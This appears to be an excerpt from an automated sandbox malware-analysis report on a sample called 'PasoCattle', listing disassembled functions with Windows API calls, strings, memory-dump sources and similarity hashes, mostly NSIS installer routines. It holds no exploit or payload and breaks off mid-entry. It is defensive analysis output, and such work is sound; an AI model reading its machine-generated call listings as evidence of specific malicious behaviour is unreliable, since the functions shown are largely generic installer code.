Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Function 00403885 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(FFFFFFFF,00403AFD,?), ref: 00403890

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
Instruction ID: 859c8e5cf93c3f84440f38a6d8c6a0cb0ce917112422b96fb642ee91708591da
Opcode Fuzzy Hash: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
Instruction Fuzzy Hash: 1BC01231504700D7E5206FB99D4EB043A54A74037DB544B7AF4F5F11F1C77C4645852D

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

M, xrefs: 00404B6F
@, xrefs: 00404BBC
, xrefs: 00404F65
N, xrefs: 00404C32

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
\*.*, xrefs: 00406D2F
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
ptF, xrefs: 00406D1A
Delete: DeleteFile("%s"), xrefs: 00406DE8
Delete: DeleteFile failed("%s"), xrefs: 00406E29

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406A7F
F, xrefs: 00406858
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
